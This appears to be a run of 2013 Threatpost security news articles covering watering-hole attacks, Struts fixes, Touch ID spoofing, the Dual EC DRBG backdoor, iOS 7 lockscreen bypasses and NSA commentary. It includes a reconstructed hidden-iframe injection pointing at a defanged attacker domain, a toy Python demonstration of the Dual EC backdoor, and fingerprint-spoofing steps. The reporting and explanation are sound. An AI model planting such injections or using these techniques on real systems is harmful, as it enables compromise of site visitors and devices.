Threatpost for B2B
Attackers exploiting a zero-day vulnerability in Microsoft’s Internet Explorer browser have compromised several popular local Japanese media outlets and have infected systems belonging to government, high tech and manufacturing organizations in Japan.
Researchers at FireEye said the attacks appear to be a large-scale intelligence gathering operation and are dropping a knock-off of the McRAT remote access malware to exfiltrate data from compromised computers.
It is unclear whether the sites used in the watering hole attack have been cleaned up, said Darien Kindlund, manager of threat intelligence at FireEye, who said his company has been in contact with CERTs in Japan about the issue.
The news of the attacks coupled with the severity of the IE zero day prompted the SANS Internet Storm Center to raise its threat level over the weekend. In the meantime, IE users are still being urged to install a FixIt tool as a temporary mitigation for the vulnerability until a patch is released. Experts believe Microsoft will issue an out-of-band patch before its next Patch Tuesday release on Oct. 8. Microsoft would not comment on a timeline when contacted by Threatpost. Meanwhile, Metasploit engineers continue to work on an exploit module for the vulnerability, but one is not yet available, a company spokesperson said.
The targeted attacks on Japanese organizations were reported by Qualys a week ago, when Microsoft issued an advisory that an unpatched IE bug affecting all versions back to IE 6 was being exploited. Microsoft released a FixIt tool and urged IE users to install it as a mitigation until a patch was ready.
“This is as severe as any browser issue can be,” Rapid7 senior manager of security engineering Ross Barrett said.
Kindlund also notes that the attacks, which date back to Aug. 19, coincide with major holidays and festivals in that part of the world; for example, today is Autumnal Equinox Day in Japan, a national holiday akin to Memorial Day in the U.S. In addition, China's Mid-Autumn Festival, a popular harvest holiday also known as the Moon Festival, took place last week, meaning that fewer companies would be online and able to mitigate any issues.
FireEye named the attack Deputy Dog after a string found in the attack code. FireEye also said that it saw a payload executable file used against a Japanese target posing as an image file hosted on a Hong Kong server. Once it infects a host computer, it connects to a command and control server in South Korea over port 443; the callback traffic is unencrypted, despite its use of port 443, FireEye said, adding that a second sample it collected also connected to the same South Korean IP address.
FireEye said it also discovered a handful of malicious domains pointing to the IP in South Korea, which allowed researchers to connect this campaign to an attack against security company Bit9 earlier this year. The same email address that registered the South Korean server also registered a domain used in the attack on the security company.
“The exploit depends on a Microsoft Office DLL which has been compiled without Address Space Layout Randomization to locate the right memory segment to attack, but this DLL is extremely common and most likely will not lower the affected population by much,” said Qualys CTO Wolfgang Kandek. “While the attack is very targeted and geographically limited to Japan, it might not affect you at the moment. But with the publication of the shim, other attackers can now analyze the condition fixed and will be able to produce an equivalent exploit fairly quickly.”
Developers behind the Apache Struts framework have released an update that fixes two vulnerabilities.
Creators of the open-source web application framework are encouraging users to upgrade to Struts 2.3.15.2 immediately.
One of the fixes addresses an issue (CVE-2013-4316) in the Dynamic Method Invocation (DMI) feature, which was previously enabled by default even though the documentation warned users to switch it off if possible; disabling it could break applications that rely on it heavily. The feature is now disabled by default – or, for users who want a workaround rather than an upgrade, it can be switched off by setting struts.enable.DynamicMethodInvocation to false in struts.xml.
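The workaround described above amounts to one line of configuration. A minimal, illustrative struts.xml fragment (a real file would also contain the application's own packages and actions, omitted here):

```xml
<struts>
    <!-- Explicitly disable Dynamic Method Invocation; this is the
         documented constant referenced in the Struts advisory -->
    <constant name="struts.enable.DynamicMethodInvocation" value="false" />
</struts>
```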
The second fix involves a broken access control vulnerability (CVE-2013-4310) in Struts 2’s action mapping mechanism. A parameter in the mechanism supported the prefix “action:” so that navigational information could be attached to buttons in forms. Unfortunately, “under certain conditions” attackers could use this feature to bypass security constraints. The update fixes the mechanism and tightens the security constraints. As with the DMI issue, there is a workaround: writing your own ActionMapper and dropping support for the “action:” prefix.
Part of the Apache Software Foundation, Struts is used by developers to build Java-based web apps. Those interested in learning more about the fixes can head to Apache’s version notes on Struts 2.3.15.2 and download what Apache is calling the “best available” version of the framework on its site.
Hackers from the venerable Chaos Computer Club in Germany have found a method for bypassing the new iPhone 5S Touch ID fingerprint security mechanism. The method, which is the first known technique for circumventing the iPhone’s newest security feature, involves taking a picture of a user’s fingerprint and then creating a latex copy of it to unlock the phone.
Since the TouchID mechanism was unveiled earlier this month, security researchers have been looking for ways to get around it. The CCC appears to have won the race, using a combination of a high-resolution picture and a latex mold of the user’s fingerprint in order to bypass the Touch ID security feature.
“First, the fingerprint of the enrolled user is photographed with 2400 dpi resolution. The resulting image is then cleaned up, inverted and laser printed with 1200 dpi onto transparent sheet with a thick toner setting. Finally, pink latex milk or white woodglue is smeared into the pattern created by the toner onto the transparent sheet. After it cures, the thin latex sheet is lifted from the sheet, breathed on to make it a tiny bit moist and then placed onto the sensor to unlock the phone. This process has been used with minor refinements and variations against the vast majority of fingerprint sensors on the market,” the CCC said in a statement.
The group, which has been active in security circles for decades, also posted a video demonstrating the technique. They said they were motivated to defeat the Touch ID in order to show that fingerprint biometrics don’t work.
“We hope that this finally puts to rest the illusions people have about fingerprint biometrics. It is plain stupid to use something that you can’t change and that you leave everywhere every day as a security token,” said Frank Rieger, a spokesperson for the CCC. “The public should no longer be fooled by the biometrics industry with false security claims. Biometrics is fundamentally a technology designed for oppression and control, not for securing everyday device access.” The group added that fingerprint biometrics have been introduced in passports in many countries despite the fact that the global rollout has produced no demonstrable security gain.
Last week, a group of security researchers put together an informal effort to raise money for a bounty to reward whoever was first to hack Touch ID. Starbug, the CCC member who pulled off the Touch ID hack, will get that bounty, which amounts to nearly $10,000 as well as some other prizes, such as Bitcoins, wine and books.
Image from Flickr photos of Randy Chiu.
So now that RSA Security has urged developers to back away from the table and stop using the maligned Dual Elliptic Curve Deterministic Random Bit Generation (Dual EC DRBG) algorithm, the question begging to be asked is why did RSA use it in the first place?
Going back to 2007 and a seminal presentation at the CRYPTO conference by Dan Shumow and Niels Ferguson, there have been suspicions about Dual EC DRBG primarily because it was backed by the National Security Agency, which initially proposed the algorithm as a standard. Cryptographer Bruce Schneier wrote in a 2007 essay that the algorithm contains a weakness that “can only be described as a backdoor.”
Given the current climate and revelations about NSA surveillance of Americans, and implications the spy agency manipulated standards efforts, in particular those overseen by NIST, Dual EC DRBG and other crypto standards are going to be scrutinized top to bottom—not to mention the deterioration of trust in any product built on that standard.
“I wrote about it in 2007 and said it was suspect. I didn’t like it back then because it was from the government,” Schneier told Threatpost today. “It was designed so that it could contain a backdoor. Back then I was suspicious, now I’m terrified.
“We don’t know what’s been tampered with. Nothing can be trusted. Everything is suspect,” Schneier said.
In his essay, Schneier wrote that not only was the algorithm derided as slow compared to better available algorithms, but it had a bias, meaning that the random numbers it generates aren’t so random. Dual EC DRBG was one of four approved random bit generators in NIST Special Publication 800-90, but it sticks out like a sore thumb.
“What Shumow and Ferguson showed is that these numbers have a relationship with a second, secret set of numbers that can act as a kind of skeleton key. If you know the secret numbers, you can predict the output of the random-number generator after collecting just 32 bytes of its output,” Schneier wrote. “To put that in real terms, you only need to monitor one TLS Internet encryption connection in order to crack the security of that protocol. If you know the secret numbers, you can completely break any instantiation of Dual_EC_DRBG.
“The researchers don’t know what the secret numbers are,” Schneier said. “But because of the way the algorithm works, the person who produced the constants might know; he had the mathematical opportunity to produce the constants and the secret numbers in tandem.”
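The relationship Schneier describes can be demonstrated on a toy elliptic curve. The sketch below is illustrative only: the prime, curve coefficients and seeds are invented, and it omits the output truncation the real standard performs (which raises the real attack's cost to roughly 2^16 candidate points per output rather than one).

```python
# Toy demonstration of the Dual_EC_DRBG backdoor: all parameters are
# invented for illustration; the real standard uses NIST P-256 and
# truncates each output block, which this sketch omits.
from math import gcd

p = 100003            # small prime with p % 4 == 3, so sqrt is one pow()
a, b = 2, 3           # curve: y^2 = x^3 + a*x + b (mod p)

def inv(n):
    return pow(n, p - 2, p)

def add(P1, P2):
    # Standard affine-coordinate point addition; None is the point at infinity
    if P1 is None: return P2
    if P2 is None: return P1
    (x1, y1), (x2, y2) = P1, P2
    if x1 == x2 and (y1 + y2) % p == 0:
        return None
    if P1 == P2:
        m = (3 * x1 * x1 + a) * inv(2 * y1) % p
    else:
        m = (y2 - y1) * inv(x2 - x1) % p
    x3 = (m * m - x1 - x2) % p
    return (x3, (m * (x1 - x3) - y1) % p)

def mult(k, pt):
    # Double-and-add scalar multiplication
    acc = None
    while k:
        if k & 1:
            acc = add(acc, pt)
        pt = add(pt, pt)
        k >>= 1
    return acc

def lift_x(x):
    # Recover a curve point with x-coordinate x, if one exists
    v = (x * x * x + a * x + b) % p
    y = pow(v, (p + 1) // 4, p)
    return (x, y) if y * y % p == v else None

# Find a base point P by brute force, then its order n
x = 1
while lift_x(x) is None or lift_x(x)[1] == 0:
    x += 1
P = lift_x(x)
n, acc = 1, P
while acc is not None:
    acc = add(acc, P)
    n += 1

# The "designer" picks a secret d and publishes Q = d^-1 * P, so P = d*Q.
# Whoever knows d holds the skeleton key.
d = 12345 % n
while gcd(d, n) != 1:
    d += 1
Q = mult(pow(d, -1, n), P)

def dual_ec_step(s):
    # One round of (toy) Dual EC: update the state, emit one output block
    s = mult(s, P)[0]          # new state = x(s*P)
    return s, mult(s, Q)[0]    # output    = x(s*Q)

state = 54321
state, r1 = dual_ec_step(state)   # attacker observes a single output r1
_, r2 = dual_ec_step(state)       # the next output, which we will predict

# Attack: lift r1 back to the point R = s*Q (the sign ambiguity in y does
# not matter, since x(d*R) == x(d*(-R))); then d*R = s*P, whose
# x-coordinate is the generator's next internal state.
R = lift_x(r1)
predicted_state = mult(d, R)[0]
predicted_r2 = mult(predicted_state, Q)[0]
print(predicted_r2 == r2)         # True: one output block breaks the stream
```

In the real deployment the attacker must also brute-force the truncated bits, a trivial cost; the essential point is that whoever generated the standard's fixed Q relative to P can reconstruct the generator's entire future state from a single observed output.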
RSA advised its developer customers via email yesterday to no longer use the algorithm, following a similar NIST recommendation last week. The algorithm is the default pseudo random number generator in a number of RSA products, including the RSA BSAFE libraries and RSA’s key management product RSA Data Protection Manager. BSAFE is embedded in many applications, providing cryptography, digital certificates and TLS security. RSA said the current product documentation can help developers change the PRNG in their respective implementations. RSA also said it would review its products to determine where the algorithm is in use and make the appropriate changes.
RSA CTO Sam Curry told Wired magazine, which first reported the story yesterday, the algorithm has been part of RSA libraries since 2004, two years before it was approved by NIST.
“Every product that we at RSA make, if it has a crypto function, we may or may not ourselves have decided to use this algorithm,” Curry told Wired. “So we’re also going to go through and make sure that we ourselves follow our own advice and aren’t using this algorithm.”
Matthew Green, a cryptographer and research professor at Johns Hopkins University, said RSA had no good reason to use the algorithm, and its decision to do so puts the security of any product using the BSAFE library into question.
“There’s no good reason whatsoever, just none,” Green said. “There was no good reason before the [Crypto 2007] backdoor presentation. It was a poor decision then, and afterwards I kind of think it was malpractice. People have known about this for a long time.”
RSA’s core product, its SecurID two-factor authentication tokens, was breached in 2011 and data stolen in that attack was used to attack Lockheed Martin and others in the defense industry. RSA said it spent more than $66 million cleaning up from the attack and helping customers. An untold number of RSA SecurID tokens were recalled and replaced. A source close to the matter told Threatpost that SecurID currently does not use the Dual EC DRBG random number generator, nor did it prior to the 2011 attack.
In the meantime, the immediate fallout is that we should expect more technology companies to make similar announcements about NIST-approved and NSA-influenced encryption. Experts are concerned too about the damage being inflicted upon NIST as a standards body. It’s likely these revelations will force greater scrutiny on the NIST-NSA relationship and nudge users and providers away from the standard in time.
“The U.S. has had an enormous influence on crypto around the world because we have NIST,” Green said in an interview before the RSA news broke. “You could see people break away from NIST, which would hurt everyone, and move to regional standards. That stuff is a problem.
“We trust NIST because there are a lot of smart people there. If you split up into regions, it’s possible things could get less secure,” Green added. “You could end up with more vulnerabilities; standards get weaker the less effort you put into it.”
Schneier agreed that scrutiny will tighten on NIST.
“The fact is, NIST has been tarnished badly, and we really need them,” he said. “This is the biggest problem: The NSA has broken the fundamental social contract of the Internet.”
Another iOS, another iPhone lockscreen bypass flaw.
Hackers have had only a few days to play around with Apple’s latest mobile operating system, iOS 7, but apparently that’s all the time one of them needed to find a flaw that can allow anyone to bypass the lockscreen on phones running the much-buzzed-about operating system.
Jose Rodriguez, an iPhone user in Spain who has proven in the past that he’s proficient at bypassing iPhone lockscreens, has posted a new video to YouTube under the username videosdebarraquito.
In the video Rodriguez demonstrates how anyone can bypass iOS 7’s lockscreen to get full access to a user’s photo gallery, email and more with a few quick swipes of the finger.
Rodriguez swipes up on the phone’s lockscreen to access the control center, opens the timer application and holds the phone’s top button as if he’s going to turn it off. Instead, he hits cancel and double clicks the home button to access the phone’s side scrolling multitask feature.
Like any lockscreen hack, it’s sometimes easier said than done. In the video Rodriguez describes the press on the home button as a double click in which “the second click is slightly stretched,” suggesting the bypass may be tricky to nail down.
Once in, though, an attacker can open the phone’s camera, view photos and even send tweets or Facebook messages from the phone’s photo gallery.
As the video winds down, Rodriguez also demonstrates the bypass on an iPad running iOS 7.
Rodriguez found a similar lockscreen bypass flaw earlier this summer in the beta version of iOS 7. That bypass, which also used the upswipe feature in combination with the phone’s calculator application, was fixed in the official iOS 7 release on Wednesday.
The update also addressed yet another lockscreen flaw that Rodriguez discovered on iOS 6.1 back in February. In that crack, he made an emergency call and held down the power button on an iPhone 5 twice to gain access to the phone, its contacts, voicemail and photos.
When contacted about the operating system’s most recent lockscreen flaw, Apple pointed us to a statement by company spokeswoman Trudy Muller. The statement just happens to be identical to one also made by Muller in February following Rodriguez’s iOS 6.1 hack: “Apple takes user security very seriously. We are aware of this issue, and will deliver a fix in a future software update,” Muller said.
The lockscreen hack is just one problem that’s popped up with iOS 7’s new swipeable control center. Earlier this week astute iPhone users noticed that anyone can take a user’s phone and enable Airplane Mode without entering the passcode – and in turn render the Find My iPhone function useless.
Researchers at Cenzic also noticed this week that if a user has the iPhone’s personal assistant Siri set up on iOS 7, anyone can send messages, post to Twitter and Facebook, and call any phone without entering the passcode.
These aren’t all bugs per se – they’re more like security oversights as they can be tweaked in the settings.
Until the next OS update concerned users can head to Settings > Control Center on their phone to toggle “Access on Lock Screen” off to prevent it from popping up for just anyone.
There’s been an ongoing back and forth dialogue this week regarding the security of iOS 7 and the latest iPhone’s fingerprint reader. While a group of hackers have pooled together money for anyone who can bust the new Touch ID mechanism on the iPhone 5S, it seems that with the latest lockscreen hack, if you’re skilled and patient enough, there could be an even easier way into the devices.
It’s no fun being a cynic, thinking that everything is bad and getting worse. It’s easy–especially in the security community–but it’s not fun. But, in light of the latest in the interminable string of revelations about the NSA’s efforts to eat away at the foundation of the security industry, the only alternative available is the equivalent of believing in unicorn-riding leprechauns.
The security community didn’t invent the concept of fear, uncertainty and doubt, but it has perfected it and raised it to the level of religion. It’s the way that security products are marketed and sold, but it’s also the way that the intelligence community justifies its extra-legal and, in some cases, unconstitutional, data-gathering practices. Just as vendors use the specter of catastrophic hacks, data loss and public embarrassment to push their wares, the NSA and its allies have used the dark shadow of 9/11 and global terrorism to justify their increasingly aggressive practices, some of which have now been shown to have deliberately weakened some of the fundamental building blocks of security.
The most damning bit of string in this ball is the news that the NSA likely inserted a back door into a key cryptographic algorithm known as Dual EC DRBG. That’s bad. What’s worse is that RSA on Thursday sent an advisory to its developer customers warning them to immediately stop using the random number generator and select a new one when using the company’s BSAFE crypto libraries.
While this is the most recent, and probably the worst, piece in all of this, the steady accumulation of evidence over the last three months makes it difficult to come to any conclusion other than this: nothing can be trusted.
More to the point, we don’t know whether anything can be trusted. And that’s actually far worse than knowing that products X, Y and Z are compromised. If you know that, you can avoid those products. But now that we have direct evidence that the NSA is in fact actively working to undermine certain cryptographic protocols and partnering with technology vendors to produce certified pre-owned software and hardware, the big question is, what’s not broken?
Unfortunately, the answer is, we just don’t know.
In a much simpler and less cynical time–say, May–we thought that our intelligence agencies were in the business of spying on our enemies. Then came the first Edward Snowden leaks, and we discovered that the NSA was collecting all of our phone records. You know, just in case. Then we heard that the agency was also vacuuming up much of the Internet traffic flowing through U.S. pipes because BOO! terrorism. But we still have encryption. As long as we can encrypt our email and Internet traffic, we’re safe from snooping, right? Oops. Turns out the NSA is in that henhouse too, working to weaken standards and crypto algorithms, and it also has some capabilities to circumvent things such as SSL.
And now, into this environment of accusation and innuendo comes the news that the attack on Belgian telco Belgacom revealed earlier this week reportedly was the work of the British spy agency GCHQ. The connection to NSA? GCHQ apparently used exploit technology developed by the NSA.
And on and on and on.
So we’ve come to the point now where the most paranoid and conspiracy minded among us are the reasonable ones. Now the crazy ones are the people saying that it’s not as bad as you think, calm down, the sky isn’t falling. In one sense, they’re right. The sky isn’t falling. It’s already fallen.
Image from Flickr photos of David Sedlmayer.
The FBI began warning computer users about the Beta Bot Trojan this week, sounding the alarm about malware that has targeted a variety of online payment platforms and financial institutions over the last few months.
According to an intelligence note prepared by the Internet Crime Complaint Center (IC3) yesterday, criminals have begun using the Trojan to block victims’ access to security websites, disable antivirus programs and trick them into giving hackers access to their computers.
According to the FBI, the malware has been spotted popping up on users’ computers in the form of a Microsoft Windows message box. When a fake “User Account Control” box asks whether to run a program called “Windows Command Processor,” users are being urged not to click “Yes.” The box claims to simply want to make changes to the computer, but in actuality it will allow hackers to “exfiltrate data from the computer,” including log-in credentials and financial information.
The malware has also been seen propagating on the popular messaging platform Skype and across USB thumb drives, according to the warning.
While the FBI refers to Beta Bot as new, the malware surfaced at the beginning of the year as an HTTP bot and later expanded its capabilities that spring, according to RSA’s Limor Kessem, who described it as a type of rootkit-based financial malware in May.
“It has since evolved,” Kessem wrote at the time, “donned a trigger list, and was repurposed for financial fraud that includes targets such as banks, ecommerce and even Bitcoin wallets.”
Kessem, who helps run RSA’s Cybercrime and Online Fraud Communications division, said at the time the malware was trying to leverage everything from larger financial institutions to “payment platforms, online retailers, gaming platforms, webmail providers, FTP and file-sharing user credentials,” among other vectors.
Kessem reported that Beta Bot’s creator planned to keep the Trojan private while selling binaries and providing technical support. Still, Beta Bot was never thought to be as sophisticated as Trojans designed specifically for bank fraud, so it’s unclear whether the FBI’s warning coincides with a new rash of Beta Bot infections or a new set of technical capabilities for the malware.
Regardless, the FBI is urging any infected users to download antivirus updates onto an uninfected computer or USB drive and run them on the compromised machine.
A string of watering hole attacks targeting oil and energy companies dating back to May could be linked to similar attacks against the U.S. Department of Labor website.
Researchers at Cisco discovered the compromised domains of 10 oil and energy companies worldwide, including hydroelectric plants, natural gas distributors, industrial suppliers to the energy sector and investment firms serving those markets. Six of the 10 sites shared the same Web design firm and three of the six are owned by the same parent company. Cisco researcher Emmanuel Tacheau speculates that credentials at the Web design firm were stolen, leading to the compromises.
The 10 sites were compromised and were serving iframe redirects to other sites hosting espionage malware, possibly the Poison Ivy remote access Trojan.
“The assumption is, with the target companies being in the energy sector, they were attempting to infect machines within that sector and exfiltrate intellectual property,” Tacheau said.
The iframes load exploit code and malware from three compromised domains—keeleux[.]com, kenzhebek[.], and nahoonservices[.]com. The exploits primarily target a Java vulnerability, CVE-2012-1723, or a flaw in Internet Explorer 8, CVE-2013-1347. A Firefox exploit, CVE-2013-1690, was also found in these attacks.
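Injected redirects of this kind are typically a small, invisible frame appended to the compromised page's HTML. A purely illustrative reconstruction (the path and attributes are hypothetical; the domain is defanged as in the text above):

```html
<!-- Hypothetical injected snippet: a zero-size, hidden iframe silently
     loads the exploit landing page from the attacker-controlled host -->
<iframe src="hxxp://keeleux[.]com/landing.html" width="0" height="0"
        style="display:none" frameborder="0"></iframe>
```

Because the frame renders nothing, visitors see the legitimate page while the exploit server can fingerprint the browser and serve whichever of the Java, IE 8 or Firefox exploits applies.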
Cisco said the malware used in the attacks is a Trojan that captures system configurations, as well as clipboard and keyboard data. It also establishes an encrypted connection to a command and control server hosted in Greece awaiting commands. All of the infected sites were notified and most had been cleaned up, Cisco said.
“Detection for the malware was extremely low, so that’s always a concern,” Tacheau said. “Fortunately, exploit detection for the exploits used is pretty good, so hopefully people will have been protected.”
Watering hole attacks are effective because they target websites of interest to the intended victim. In the past, government policy resource websites and mobile developer forums have been compromised in other watering hole attacks.
The IE vulnerability used in the Department of Labor attacks was patched in May, but not before those attacks spread to nine other sites, including the U.S. Agency for International Development (USAID) and research firms in Asia.
Given the timing of the two attacks and the use of the same Internet Explorer exploit, the Department of Labor attacks could be tied to the energy and oil attacks as well.
“That’s the million dollar question,” Tacheau said. “There certainly are a lot of commonalities. If you combine the timing, the shared exploit and the sector targeted, it does seem at least suspiciously in favor of a semblance of attackers.”
The oil and energy attacks, however, were found coincidentally by Cisco researchers looking at system logs and noticing the commonalities in the sectors targeted.
“It boils down to a matter of volume,” Tacheau said. “These were low volume-high stakes attacks; these sites don’t attract a large number of visitors. The DOL attacks were different. When you have a high profile site like that, those are always going to be spotted off the bat.”
With all of the disturbing revelations that have come to light in the last few weeks regarding the NSA’s collection methods and its efforts to weaken cryptographic protocols and security products, experts say that perhaps the most worrisome result of all of this is that no one knows who or what they can trust anymore.
The fallout from the most-recent NSA leaks, which revealed the agency’s ability to subvert some cryptographic standards and its “partnerships” with software and hardware vendors to insert backdoors into various unnamed products, has continued to accumulate over the course of the last couple of weeks. Cryptographers and security researchers have been eager to determine which products and protocols are suspect, and the discussion has veered in a lot of different directions. But one thing that’s become clear is that when the government lost the so-called Crypto Wars in the 1990s, the NSA didn’t just go back to Fort Meade and tend to its knitting.
“The good news, I thought until a couple of weeks ago, is that the government lost that war. What we didn’t realize is that the Crypto Wars never ended, they just moved underground,” Matthew Green, a cryptographer and research professor at Johns Hopkins University, said during a roundtable sponsored by the university on Wednesday. “Some of these standards were actually built to be less secure so that the NSA might be able to spy on us.”
One of the few bits of concrete information that’s emerged in all of this is that a random-number generator developed by NIST several years ago is now in question. Cryptographers have suspected for some time that the Dual_EC_DRBG random-number generator, which is included in some standards, may have been deliberately weakened. NIST issued a statement in the last few days warning people not to use Dual_EC_DRBG.
“Concern has been expressed about one of the DRBG algorithms in SP 800-90/90A and ANS X9.82: the Dual Elliptic Curve Deterministic Random Bit Generation (Dual_EC_DRBG) algorithm. This algorithm includes default elliptic curve points for three elliptic curves, the provenance of which were not described. Security researchers have highlighted the importance of generating these elliptic curve points in a trustworthy way. This issue was identified during the development process, and the concern was initially addressed by including specifications for generating different points than the default values that were provided. However, recent community commentary has called into question the trustworthiness of these default elliptic curve points,” the NIST statement says.
Green said that the recent NSA leaks have reinforced the difficulty of producing good standards and algorithms, never mind trying to do so when the NSA has inserted itself surreptitiously into the process.
“Crypto is incredibly hard to get right when you’re not fighting someone like the NSA. How do we deal with that when someone very powerful is going around us to build weaknesses in from the start?” Green said.
“We don’t know how good these standards are. Is there any way to rebuild that trust? How secure are we going to be when every moron in the world starts to build their own standards? If the NSA is doing it, then who knows who else might be doing it.”
Aside from the questions about weak or deliberately compromised protocols, experts also say there could be long-range ramifications for security vendors who are trying to sell their products to a suddenly skeptical customer base.
“Should we accept that being secure is worth the blowback? Should anybody trust us now?” Green said. “If we’re building this technology and exporting it to the rest of the world, why should anybody buy it? I don’t know what the impact is.”
Image from Flickr photos of Sebastien Wiertz.
UPDATE: In an earlier version of this story, we failed to give proper credit to Robert Graham for his involvement in this project.
A group of researchers, hackers, and other security enthusiasts are pooling their money and offering it as a bounty to the first person who can successfully crack the Touch ID fingerprint authentication mechanism on Apple’s recently released iPhone 5S.
It all started as a discussion between security researchers Don Bailey and Nick DePetrillo, according to Bailey. DePetrillo then fired off a tweet, offering $100 to the first person who could lift a fingerprint off an iPhone 5S, recreate it, and reliably unlock the phone in five tries or fewer. From there, a number of other security professionals and hobbyists got in on the pot, mostly via Twitter, and it is now worth more than $14,000 and counting. You can keep an eye on the growing pool of money on the contest’s dedicated website, which was created by one of the contest’s other founding members, Robert Graham.
This is something of a casual contest, so a list of official rules is pretty much nonexistent. At first, in order to take the pot, DePetrillo said he wanted “a video of the process from print, lift, reproduction and successful unlock with reproduced print,” but he and Bailey are in agreement that they’ll pay out their portions of the pool for side channel demos as well. It is not clear what criteria the other contributors will use to decide whether or not an attack is worthy of their money too.
The clearest criterion seems to be that the attack must exploit either the hardware or the software associated with the Touch ID interface. A simple lock screen circumvention is not enough.
The contest is mostly for fun, but there is a serious element to it.
“We want to get more people aware of the new pieces of hardware functionality coming out,” Bailey said in a phone interview. “Because not a lot of people are looking at hardware security, and by doing things like this we get to put a spotlight on security in places where people usually presume it’s either too easy or too hard.”
The contest is based at least in part, according to Bailey, on the fact that these sorts of sensor-based functionalities are implemented in products in such a way that they take up as little room and require as little energy and processing power as possible, despite their versatility.
“You usually get an absurd amount of functionality in a sensor,” Bailey said. “But really when it actually comes to use-case, drivers are actually implemented with the least amount of capabilities necessary to accomplish a task.”
He went on to say that he and DePetrillo are betting that Apple, which could have implemented Touch ID in a more complicated way, probably didn’t – because the company is likely just doing the best it can to get a competent piece of hardware out the door as fast as possible.
Bailey said that no one has come forward yet with a working exploit or otherwise indicated that they are closing in on one, but indicated that a lot of people – himself included – are taking a crack at hacking Touch ID. He and DePetrillo are hoping an exploit will emerge in the next couple of weeks.
When asked if he would take the bounty for his own contest if he were the one to break Touch ID, Bailey said, quite emphatically:
“Hell yeah, I’ll take the bounty!”
Anyone is welcome to contribute to the bounty, and can work that out with Bailey, DePetrillo, or whoever else has gotten involved on Twitter under the hashtag #istouchidhackedyet.
They are asking for a minimum contribution of $50, but some individuals are putting up larger sums of money – Graham in particular, who doled out nearly $75 for the domain name and six months of web hosting – and a lot of people are offering up Bitcoins. One person is offering a free iPhone 5C to whoever breaks the fingerprint scanner. Just before initial publication, Arturas Rosenbacher, an entrepreneur and venture capitalist, pledged $10,000.
The National Security Agency, as it turns out, is just as reactive when it comes to information security as 99 percent of the enterprises out there.
America’s top spy agency gives out too much privileged access to employees and contractors, allows removable storage devices in sensitive areas, and has no system of checks and balances with regard to those employees with privileged access. And only when the stuff hits the fan, as it has with Edward Snowden, does it amp up its security.
Lonny Anderson, head of the NSA’s Technology Directorate, was interviewed on National Public Radio yesterday and told the world that the agency’s investigators have figured out how Edward Snowden got his hands on all those sensitive documents.
“We have an extremely good idea of exactly what data he got access to and exactly how he got access to it,” Anderson told NPR’s Morning Edition.
So does everyone else: You gave it to him. And now in true reactive fashion, the NSA has tightened up its loose policies and clamped down on privileged access. Let the next Snowden try that again.
Vilified by some as a traitor and hailed by others as a hero for outing the depths of the NSA’s surveillance of Americans in the name of national security, Snowden should serve as the poster child for the damage one insider with the right password can do to any organization. Here is a Booz Allen contractor hired by the NSA as a system administrator who walked away with enough secret information to shake a nation’s faith in its Constitution, undermine the notion of privacy each American is supposed to treasure, and corrupt the trust Americans have in their government.
U.S. senators such as Dick Durbin (D-Ill.) have grilled NSA officials including director Keith Alexander about Snowden and why the agency would give someone with relatively little experience—Snowden is a high school and community college dropout with a GED who once worked as a security guard for the NSA—clearance and access to classified information.
“I have great concerns over the process and access he had,” Alexander said in June before the Senate Appropriations Committee. “We have to look into it and fix it across the intelligence community. We have to look at the processes and oversight of those processes, determine where it went wrong and how we’re going to fix it.”
Could it all have been avoided? Sure, I suppose. But human nature being what it is, most of us don’t put measures in place to fix problems before they happen. We wait until our teeth hurt to go to the dentist. We put on 20 pounds too many before we watch what we eat. And we give out too much access and assign too many system permissions until documents go missing and people double up on their mistrust of the government.
Two unnamed officials also talked to NPR, saying that the access Snowden had was part and parcel of his job as a system admin. He had access to an NSA intranet page where documents, memos, PowerPoint slides and other data were stored for analysts to read and discuss online. Snowden had secret compartmented clearance to the data; ironically enough, it was his job to move those documents from the intranet to a secure location for analysts to access them. Worse, NSA officials knew Snowden was accessing the data, but just figured he was doing his job, the NPR report said.
Anderson, the NSA CTO and CIO, said policies and procedures on the site have changed.
“Someone today could get access to that Intranet because it still exists,” Anderson said. “Could someone today do what he did? No.”
Back in June when the leaks were made public in the Guardian—and long before—Anderson acknowledged that NSA laptops had USB drives and analysts and admins had the ability to insert thumb drives and store data on removable media.
“One thing we have done post media leaks is lock those down hard so that those are all in two-person control areas,” Anderson said, referring to a new two-person rule implemented by the NSA post-Snowden. Details are scarce, but two NSA employees with similar roles must work together to perform certain tasks.
“It’s impossible to work on their own now,” Anderson said. “If you’ve got privileged access on our networks like a system administrator, you’re being given a privilege that very few people have. You’re not going to be doing anything alone.”
He also said that the NSA is tagging data, likely through some kind of rights management technology, enabling NSA leaders not only to determine who gets access to documents, but to monitor the data as it is being accessed.
The NSA should serve as an object lesson to any organization about the risks posed by privileged insiders. Resources exist from places such as Carnegie Mellon’s Software Engineering Institute that help you spot shady insiders and other trends in people and behavior that can limit potential damage. But will it make a difference? Probably not, because while most enterprises talk a good game about security, the fact is that most are doing just enough in order to comply with an industry regulation and loose policies will continue to be the norm.
Understand, too, that while it’s easier to be reactive when bad things happen than to anticipate every possibility and every outcome, bad guys are really good at winning cat-and-mouse games; in fact, anyone intent on gaming a system is likely to always be a step ahead of the good guys.
We are one day in and Apple’s sleek new mobile operating system, iOS 7, has been dissected to death – the colors, the similarities to Android’s OS, the amount of time it took some users to download the update from Apple’s servers. Those talking points aside, the update also brought a slew of bug fixes, 80 in total, to devices that should appease Apple users with security concerns.
The update fixes a handful of issues, most of which could lead to a denial-of-service attack or trigger unexpected application termination or arbitrary code execution on devices such as an iPad, iPod Touch or iPhone running an out-of-date OS.
Some of the bigger flaws addressed involve two fixes for passcode bypass bugs: one (CVE-2013-0957) that could have allowed an app in the third-party sandbox to determine the user’s passcode, and a second (CVE-2013-5147) that exploited the way the iPhone handled calls to bypass the screen lock in iOS 6.1.
Another, similar data privacy bug could have allowed an attacker to intercept user credentials via a compromised Trustwave certificate (CVE-2012-5134). Trustwave issued and subsequently revoked the faulty sub-CA certificate.
Four Safari bugs were also addressed in yesterday’s update, including a problem where the browser’s history remained visible even after it was cleared, a memory corruption issue in the way the browser handled XML files, and a cross-site scripting flaw on sites that allow users to upload files.
The oldest bug in the batch appears to be a kernel issue from 2011 discovered by Marc Heuse, wherein an attacker could have sent specially crafted IPv6 packets to an iPhone 4 and caused a high CPU load. While the bug is tracked as CVE-2011-2391 in the Common Vulnerabilities and Exposures database, the entry warns that the attached date does not necessarily reflect when the vulnerability was discovered.
Several vulnerabilities from 2012 are also addressed in the update, all involving arbitrary code execution bugs in the libxml and libxslt libraries.
